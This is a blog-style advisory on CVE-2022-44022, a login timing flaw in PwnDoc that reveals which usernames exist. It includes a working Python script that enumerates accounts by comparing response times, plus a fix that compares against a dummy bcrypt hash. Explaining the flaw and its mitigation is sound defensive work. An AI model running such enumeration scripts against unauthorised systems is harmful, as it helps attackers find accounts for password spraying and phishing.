PwnDoc is a popular collaborative pentest reporting platform, widely used for automating report generation and sharing. Up to version 0.5.3, however, its login endpoint leaked whether a username existed through response timing, so a remote attacker could enumerate valid accounts without knowing a single password. In this post, we'll break down how the vulnerability works, show some code snippets, discuss how it is exploited and mitigated, and list the original advisories.

CVE-2022-44022 identifies a vulnerability in PwnDoc up to version 0.5.3.

- Issue: Login response timings allow remote attackers to detect which usernames exist on the system.
- Impact: Enables information gathering (user enumeration), paving the way for brute force, phishing, or targeted attacks.

How the Vulnerability Works

When you attempt to log in, PwnDoc looks up your username and, only if it exists, verifies your password. A wrong username is rejected immediately; a valid username takes longer, because the server goes on to run the (deliberately slow) bcrypt comparison against the stored hash.

Sounds harmless, but here's the catch: the difference in response times lets an attacker figure out which usernames are valid, without knowing any password.

- Invalid username: fast reject, because the bcrypt comparison never runs.
- Valid username (but wrong password): slower reject (e.g., 350ms), because bcrypt is expensive by design.

This measurable delay gives the attacker a clear signal, and the identical "Invalid credentials" message does nothing to hide it.

Here's simplified Node.js logic similar to PwnDoc's backend login handler (User is the Mongoose user model and generateToken issues the session token; both are left abstract here):

const bcrypt = require('bcrypt');

async function login(username, password) {
  const user = await User.findOne({ username: username });
  if (!user) {
    // Username not found: return immediately, no hashing work is done
    return { success: false, message: "Invalid credentials" };
  }
  // Username found: now check the password (bcrypt.compare re-hashes the
  // candidate password with the stored salt and cost, which takes ~100s of ms)
  const isMatch = await bcrypt.compare(password, user.password);
  if (!isMatch) {
    // Same message as above, but reached only after the slow comparison
    return { success: false, message: "Invalid credentials" };
  }
  // Successful login
  return { success: true, token: generateToken(user) };
}

Problem: the timing differs depending on whether the username exists, and the attacker needs no password at all to observe it:

- Send a login request with a username that almost certainly does not exist and a random password, and measure the response time. This is the baseline.
- Send a second request with a candidate username such as admin and the same random password. Measure the response time again.
- If admin exists, PwnDoc will take noticeably longer, because it went on to run the bcrypt comparison before rejecting the request.

Here's a realistic script to test usernames (it takes several samples per name and uses the median, since a single measurement is easily skewed by network jitter):

import statistics
import time

import requests

url = "https://<pwndoc-url>/api/auth/login"
usernames = ["admin", "administrator", "test", "reporter", "user1"]
rounds = 5  # samples per username; one is too noisy to trust
responses = {}

for uname in usernames:
    data = {"username": uname, "password": "RandomBadPass123!"}
    samples = []
    for _ in range(rounds):
        start = time.perf_counter()
        requests.post(url, json=data, timeout=10)
        samples.append(time.perf_counter() - start)
    responses[uname] = statistics.median(samples)
    print(f"Username: {uname} - Median Response Time: {responses[uname]:.3f}s")

print("\nLikely valid usernames (longer time):")
# 0.1 s above the mean: crude, but a bcrypt comparison adds far more than that
threshold = sum(responses.values()) / len(responses) + 0.1
for uname, duration in responses.items():
    if duration > threshold:
        print(uname)

This will print out usernames whose response time is clearly above the rest, indicating that they are probably present in the system. The mean-plus-0.1s cutoff assumes most candidates are invalid; if the list is mostly valid names, the mean drifts upward and real accounts slip under it, so a baseline built from a few random, definitely-nonexistent usernames is more reliable.

Mitigation

The fix for this class of bugs is simple in theory: make the server do the same amount of work whether or not the username exists, so that the response time no longer depends on the lookup result. In practice that means always running the password hash comparison, against a dummy hash when there is no such user.

Here's how you can "equalize" timing (the dummy hash is generated once at startup with the same cost factor as real user hashes, so comparing against it takes as long as comparing against a real one):

const bcrypt = require('bcrypt');
const crypto = require('crypto');

// Must match the cost used when user passwords were hashed; a cheaper dummy
// hash would reintroduce a (smaller) timing difference.
const SALT_ROUNDS = 10;
// A hash of a random secret nobody knows, computed once so that bcrypt.hash
// itself never runs inside the request path.
const dummyHashPromise = bcrypt.hash(crypto.randomBytes(32).toString('hex'), SALT_ROUNDS);

async function login(username, password) {
  const dummyHash = await dummyHashPromise;
  const user = await User.findOne({ username: username });
  // Compare the password anyway, even for invalid usernames
  const hash = user ? user.password : dummyHash;
  const isMatch = await bcrypt.compare(password, hash);
  if (!user || !isMatch) {
    return { success: false, message: "Invalid credentials" };
  }
  return { success: true, token: generateToken(user) };
}

This way, every attempt pays the bcrypt cost, so the only remaining difference between the two paths is the database lookup, which is orders of magnitude smaller than the hash comparison and buried in network jitter. It is not literally constant time, so verify the fix by measuring: the median response for a valid username with a wrong password and for a random username should be indistinguishable. Rate limiting on the login endpoint is a sensible second layer, since any residual leak needs many samples to exploit.

References / Further Reading

- CVE-2022-44022 entry (MITRE)
- GitHub Advisory Database entry for CVE-2022-44022
- NIST NVD entry for CVE-2022-44022
- PwnDoc GitHub repository
- OWASP: Authentication Timing Attacks

Final Thoughts

CVE-2022-44022 is a good reminder that even a small leak through timing can have real consequences: a valid-username list is the starting point for password spraying and targeted phishing. Keep the work done by an authentication endpoint independent of whether the account exists. If you manage a PwnDoc instance, update to a fixed release, and consider measuring your own login flows for similar leaks.

*Stay safe, and keep your pentest tools locked down!*


*Exclusive content by AI | Please don’t use this information for unauthorized testing or exploitation!*

Timeline

Published on: 10/30/2022 00:15:00 UTC
Last modified on: 11/01/2022 12:57:00 UTC